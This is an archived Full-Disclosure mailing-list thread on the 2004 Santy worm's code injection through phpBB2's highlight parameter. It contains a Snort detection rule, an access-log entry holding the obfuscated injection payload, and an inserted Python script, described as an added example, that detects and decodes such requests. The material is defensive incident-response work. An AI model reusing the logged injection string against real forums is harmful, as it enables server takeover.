Full Disclosure mailing list archives
RE: Worm hitting PHPbb2 Forums
From: "Mattias R. Lindgren" <mailinglists () mattiaslindgren com>
Date: Wed, 22 Dec 2004 22:51:40 -0700
There is a workaround posted http://forums.ir0x0rz.com/viewtopic.php?t=34
I'm hoping this will be enough to protect phpBB installs.

~M

-----Original Message-----
From: M. Shirk [mailto:shirkdog_list () hotmail com]
Sent: Tuesday, December 21, 2004 5:53 PM
To: incidents () securityfocus com
Cc: full-disclosure () lists netsys com
Subject: RE: Worm hitting PHPbb2 Forums

I missed an important "F" on my previous post for these snort sigs.

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE phpBB Highlighting Code Execution - Santy.A Worm"; flow:to_server,established; uricontent:"/viewtopic.php?"; nocase; uricontent:"&highlight='.fwrite(fopen("; nocase; reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513; sid:9999999; rev:1;)

Shirkdog
http://www.shirkdog.us
From: "Mike" <mike_sha () shaw ca>
To: <mark () onnow net>, "L. Walker" <lwalker () magi net au>
CC: <incidents () securityfocus com>, <full-disclosure () lists netsys com>
Subject: RE: Worm hitting PHPbb2 Forums
Date: Tue, 21 Dec 2004 13:28:27 -0500

Does this affect PHPBB2 in general, or is it platform specific as well?

Mike Fetherston

-----Original Message-----
From: mark () onnow net [mailto:mark () onnow net]
Sent: Tuesday, December 21, 2004 12:47 PM
To: L. Walker
Cc: incidents () securityfocus com; full-disclosure () lists netsys com
Subject: Re: Worm hitting PHPbb2 Forums

From what I have read, this can happen in any phpbb version lower than 2.0.11. This exploit is becoming frequent. Normally uploading a ddos bot.

Mark

Quoting "L. Walker" <lwalker () magi net au>:

Just spotted two clients hit by this. One client didn't update his software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation16. Chkrootkit says it's Adore, however could be something else. Datacenter wasn't very smart and has since wiped the server, so no binaries or other evidence. Generation 12 only wiped out PHP files, replacing them with its own message on other client's PHPbb2 forum.
Access logs show:

66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET /forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 270 "http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

--
L. Walker <lwalker at magi dot net dot au>
Network Administrator / Consultant

------------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
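The Snort rule quoted above looks for the literal `&highlight='.fwrite(fopen(` on the wire, while the access log L. Walker posted shows the same injection double-URL-encoded (`%2527%252E` is `'.` after two rounds of decoding, and the PHP code is spelled out as a `chr()` chain). The following log-review script, an added example that is not code from this thread or from phpBB, applies the same idea to Apache combined-format log lines after the fact: it decodes the `highlight` parameter twice, flags values that start with `'.` and call a PHP function, and collapses `chr()` chains into the string literals they build so an analyst can read what a flagged request tried to do. The log lines, IP addresses and the sample payload are constructed for the example; the field layout of the log regex is assumed to be Apache's default combined format.

```python
"""Find phpBB 2.0.x 'highlight' code-injection attempts in Apache access logs.

Added example for the Full-Disclosure thread on the Santy worm; not phpBB's
code and not the Snort rule itself. Sample log lines below are constructed.
"""
import re
from urllib.parse import unquote

# Apache combined log format (assumed default layout): we only capture what we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# PHP calls seen in the thread's rule/log (fwrite, fopen, system, chr) plus the
# usual command-execution family; matched case-insensitively like Snort's nocase.
CODE_CALLS = re.compile(
    r"\b(system|exec|passthru|shell_exec|fwrite|fopen|eval|chr)\s*\(", re.I)

def decode_highlight(uri):
    """Return the highlight= value decoded twice, or None if the parameter is absent.

    The logged requests are double-encoded (%2527 -> %27 -> '), because the web
    server decodes once and phpBB's viewtopic.php urldecode()d the value again.
    """
    m = re.search(r'[?&]highlight=([^&\s]*)', uri, re.I)
    if not m:
        return None
    return unquote(unquote(m.group(1)))

def deobfuscate_chr(expr):
    """Replace every run chr(n).chr(n)... with the quoted string literal it builds."""
    run = re.compile(r'chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*', re.I)
    def repl(m):
        text = ''.join(chr(int(n)) for n in re.findall(r'chr\((\d+)\)', m.group(0), re.I))
        return repr(text)
    return run.sub(repl, expr)

def classify(line):
    """Return (ip, verdict, decoded_highlight) for one log line, or None if unparseable.

    verdict is 'ignore' (not viewtopic.php), 'benign' (ordinary search term) or
    'injection' (value opens with the quote-and-concatenate "'." and calls PHP code).
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, uri = m.group('ip'), m.group('uri')
    if 'viewtopic.php' not in uri.lower():
        return (ip, 'ignore', None)
    hl = decode_highlight(uri)
    if hl is None:
        return (ip, 'benign', None)
    if hl.startswith("'.") and CODE_CALLS.search(hl):
        return (ip, 'injection', hl)
    return (ip, 'benign', hl)

def scan(lines):
    """Return [(ip, readable_payload)] for every injection attempt in the log lines."""
    hits = []
    for line in lines:
        result = classify(line)
        if result and result[1] == 'injection':
            hits.append((result[0], deobfuscate_chr(result[2])))
    return hits

# Constructed sample log: one normal search, one search containing an apostrophe,
# one injection attempt in the fwrite(fopen( shape from the Snort rule (payload
# writes the string "hi" to a made-up path), and one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Dec/2004:18:00:01 +1100] "GET /forum/viewtopic.php?t=34&highlight=security+worm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [21/Dec/2004:18:00:30 +1100] "GET /forum/viewtopic.php?t=34&highlight=don%27t HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [21/Dec/2004:18:07:17 +1100] "GET /forum/viewtopic.php?p=1445&highlight=%2527%252Efwrite(fopen(chr(47)%252Echr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(120),chr(119)),chr(104)%252Echr(105))%252E%2527 HTTP/1.0" 200 270 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [21/Dec/2004:18:09:00 +1100] "GET /forum/index.php HTTP/1.1" 200 8000 "-" "-"',
]

if __name__ == '__main__':
    for ip, payload in scan(SAMPLE_LOG):
        print(f'{ip}: {payload}')
```

Feed it a real log with `scan(open('access_log').read().splitlines())`; the `'.`-prefix check keeps ordinary searches containing an apostrophe from being reported, and the deobfuscated output is what you would paste into an incident ticket rather than the raw `chr()` chain.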
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Worm hitting PHPbb2 Forums David Devault (Dec 21)
- <Possible follow-ups>
- RE: Worm hitting PHPbb2 Forums Christopher Adickes (Dec 22)
- RE: Worm hitting PHPbb2 Forums Mike (Dec 22)
- RE: Worm hitting PHPbb2 Forums M. Shirk (Dec 21)
- Re: RE: Worm hitting PHPbb2 Forums Willem Koenings (Dec 22)
- RE: RE: Worm hitting PHPbb2 Forums Patrick Nolan (Dec 23)
- RE: RE: Worm hitting PHPbb2 Forums Paul Laudanski (Dec 23)
- Re: Worm hitting PHPbb2 Forums mark (Dec 22)
- RE: Worm hitting PHPbb2 Forums Mattias R. Lindgren (Dec 23)